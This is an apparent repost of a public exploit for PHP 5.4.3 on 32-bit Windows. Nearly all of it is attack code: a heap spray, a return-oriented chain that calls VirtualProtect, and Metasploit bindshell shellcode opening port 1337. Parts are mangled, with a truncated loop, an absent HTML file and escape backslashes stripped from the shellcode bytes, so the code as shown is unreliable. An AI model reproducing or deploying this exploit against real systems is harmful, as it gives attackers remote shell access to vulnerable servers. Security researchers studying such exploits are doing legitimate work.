// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== offset-brute.html ===================0day PHP 5.4.3 0day by 0in & cOndis =================== 0day.php =================== 0x048d0030 $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] $spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); // Adress of VirtualProtect 0x7c801ad4 $spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); // LPVOID lpAddress = 0x048d0060 $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); // SIZE_T dwSize = 0x01000000 $spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 $spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068 $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] $spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4); // Ret Address = 0x048d0080 $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); $stacktrack = "xbcx0cxb0xc0x00"; // Universal win32 bindshell on port 1337 from metasploit $shellcode = $stacktrack."x33xc9x83xe9xb0". "x81xc4xd0xfdxffxff". "xd9xeexd9x74x24xf4x5bx81x73x13x1d". "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96". "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2". "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0". "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41". "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82". "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2". "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39". "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9". "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b". "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a". "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88". "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01". "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20". "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e". "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39". "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44". "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96". "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38". "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9". "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09". "x4ex33xe4x96xcdxccx32x69"; $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); $fullspray=""; for($i=0;$i 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] echo $arr; echo $spray; ?>
留言评论(旧系统):
文章来源于lcx.cc:PHP 5.4 (5.4.3) Code Execution (Win32)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论